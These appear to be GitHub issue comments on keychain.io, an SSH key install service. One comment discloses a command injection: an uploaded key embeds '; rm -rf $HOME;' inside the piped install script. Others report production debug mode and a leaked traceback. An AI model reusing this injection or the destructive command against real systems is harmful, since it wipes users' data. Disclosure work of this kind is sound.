Is there a way this can work with a Windows machine? Since it doesn't have bash, you can run the install script.

I love the idea, but curl -s | bash is not something any user should trust.

It's also very easy to inject commands, check out my key (do NOT install it!).

$ curl -s http://ssh.keychain.io/[email protected]/install
mkdir -p $HOME/.ssh
touch $HOME/.ssh/authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCDav6GptWnxXDEV5XK891RQfr6BGYLOoJ4RTttz57IQkMwt5SxVX581hGjhHwMSYlNGnI1BXKSnN25ZohU33k4pfyWtcfBZb6YL2FLzDQcIM3iNOwRW4aW6ABbPwL6LmO/rbu02sBWvf8Oqwc4GtXt4O1++gZcbHCSP1VE/YXR8wRrjP2wNWhCE8PYIO07w8p918QlvPLSO3vU9VH0cXph31ENkweOl20Nzys/CYglT518cLRBY2NWiQ1eQEVFuThLDBLu50GOkC7OgjgM3hhiRLjj/HdeVnzM/9ZAiaqJY0Q1HvM6QUT7Z2gcPn9UIicEAIT9fFRstD6MqE9v0x9 [email protected]"; rm -rf $HOME; "" >> $HOME/.ssh/authorized_keys

But even if the injection is fixed, piping to bash is inherently insecure. How about having a keychain client that would install the keys? I'd be happy to contribute.

Discovered in #2, keychain.io has not been updated since at least a0f7017

This leads to - as shown in #2 - the clients getting more information than they should really care or know about.
Debugging is fine for development, but you shouldn't leave it on for production.

You could perhaps do something like: app.debug = bool(os.environ.get("FLASK_DEBUG", 0)) or something similar, so that you can run it as FLASK_DEBUG=1 python __main__.py, or how-ever you so desire.

Just watched your screencast on Dokku and stumbled across this.

Really interested in using keychain.io for https://commando.io. When are you planning on launching?

Cheers.

It actually outputs it to me:

File "keychain/app.py", line 115, in all_keys
keys_ = [lookup_key(email, key) for key in keys[email]]
NameError: global name 'keys' is not defined

Traceback (most recent call last):
File "/app/.heroku/python/lib/python2.7/site-packages/eventlet/wsgi.py", line 382, in handle_one_response
result = self.application(self.environ, start_response)
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1701, in call
return self.wsgi_app(environ, start_response)
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1689, in wsgi_app
response = self.make_response(self.handle_exception(e))
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1687, in wsgi_app
response = self.full_dispatch_request()
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1360, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1358, in full_dispatch_request
rv = self.dispatch_request()
File "/app/.heroku/python/lib/python2.7/site-packages/flask/app.py", line 1344, in dispatch_request
return self.view_functionsrule.endpoint
File "keychain/app.py", line 94, in confirm_action
action0
File "keychain/app.py", line 43, in upload_key
k.set_contents_from_string(key.strip())
File "/app/.heroku/python/lib/python2.7/site-packages/boto/s3/key.py", line 1124, in set_contents_from_string
encrypt_key=encrypt_key)
File "/app/.heroku/python/lib/python2.7/site-packages/boto/s3/key.py", line 926, in set_contents_from_file
provider = self.bucket.connection.provider
AttributeError: 'NoneType' object has no attribute 'connection'